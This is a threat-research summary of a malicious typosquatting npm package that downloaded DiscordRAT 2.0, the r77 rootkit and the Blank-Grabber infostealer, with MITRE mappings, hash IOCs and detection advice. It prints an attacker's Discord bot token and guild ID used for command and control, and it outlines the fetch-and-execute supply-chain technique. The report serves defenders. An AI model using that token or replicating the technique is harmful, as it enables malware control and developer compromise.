Keypoints
- Researchers found a typosquatting npm package named node-hide-console-windows that mimicked the legitimate node-hide-console-window package to trick developers.
- The package’s main file (index.js) downloaded and immediately executed a DiscordRAT 2.0 binary from the internet.
- DiscordRAT 2.0 used a Discord bot (bot token and guild) as its C2, creating a channel per victim and accepting commands including !rootkit and !unrootkit.
- The !rootkit command launched the r77 fileless ring‑3 rootkit, which hides files/processes and creates registry subkeys to conceal the executable path and process.
- Later versions of the package also fetched an additional PyInstaller binary labelled “visual code update,” identified as Blank‑Grabber infostealer.
- ReversingLabs published IOCs including package SHA1s and second‑stage payload SHA1s and reported the packages to npm maintainers for takedown.
- The campaign was small (≈700 downloads) but notable as an instance of open‑source components being used to deliver a rootkit via a public package repository.
MITRE Techniques
- [T1195] Supply Chain Compromise – Attackers used typosquatting to publish a malicious npm package impersonating a legitimate module (‘a technique known as typosquatting, in which cybercriminals stand up malicious packages with names that closely resemble legitimate and widely used open source modules’).
- [T1105] Ingress Tool Transfer – The package’s index.js fetched an external executable and executed it (‘it fetched an executable that was detonated immediately thereafter’).
- [T1102] Web Service – Discord was used as the command-and-control channel for the RAT, with the bot creating channels per victim (‘creates a channel in the associated Discord server – one channel for each victim’).
- [T1014] Rootkit – The r77 rootkit (fileless, ring‑3) was deployed to hide files and processes (‘r77 is a fileless ring 3 rootkit that is able to disguise files and processes’).
- [T1112] Modify Registry – r77’s deployment included creating registry subkeys to hide the executable path and process (‘two registry subkeys are created to hide the bot’s presence’).
Indicators of Compromise
- [npm package] malicious package – node-hide-console-windows (typosquat of node-hide-console-window)
- [Package SHA1] examples – cbb162d0623ff74925ecd4cfff7faef87bf45efd (node-hide-console-windows v1.5.7), af0dbb3f13dc432924092783fe30433c24b3c929 (v1.5.6), and 8 more hashes
- [Second‑stage SHA1] downloaded executables – 1563b5814b7dd655892a80be3a6cc740dad282a3, 43feaf19f1a7410358ab8cd51f00b2446d62e798
- [Credentials / Identifiers] Discord configuration – bot token MTEzNTM5NDcwMTk3ODEwODAxNg.GtdDHG.Aaj0Z8_IKQtFSG2p6VIQeDqNBvd-PkLeTD8WnE, guild ID 1140853704396902591 (embedded in DiscordRAT binary)
- [File names] malicious files – index.js (main file in package that downloads payloads), visual code update (PyInstaller executable identified as Blank‑Grabber)
ReversingLabs detected a malicious typosquatting npm package (node-hide-console-windows) during automated supply‑chain monitoring. The package’s package.json pointed to index.js as the main entry; that index.js contained clear (non‑obfuscated) code which downloaded an executable from the internet and executed it immediately. The maintainer account was newly created and the package versioning was crafted to mirror the legitimate project, which are common red flags used to identify suspicious packages.
Static and dynamic analysis of the downloaded executable identified it as DiscordRAT 2.0. The binary contained a Discord bot token and guild ID; when executed it created a Discord channel per infected host and awaited operator commands. Among the available commands was !rootkit, which launched the r77 fileless ring‑3 rootkit; deployment involved creating two registry subkeys to hide the executable path and to hide the bot’s process. Researchers also observed additional behavior in later package versions where index.js fetched a second PyInstaller‑compiled payload labeled “visual code update,” which analysts identified as Blank‑Grabber infostealer.
Key technical indicators for detection and response include the malicious package name (node-hide-console-windows), the list of package SHA1s for each published version, the two second‑stage payload SHA1s, and the embedded Discord token/guild ID used for C2. Detection strategies should include verifying package maintainer history and naming, scanning package contents (especially main entry points like index.js) for runtime downloads and execution, blocking or sandboxing downloads from unknown hosts, and comparing binaries against the published SHA1s to detect these payloads.
Read more: https://www.reversinglabs.com/blog/r77-rootkit-typosquatting-npm-threat-research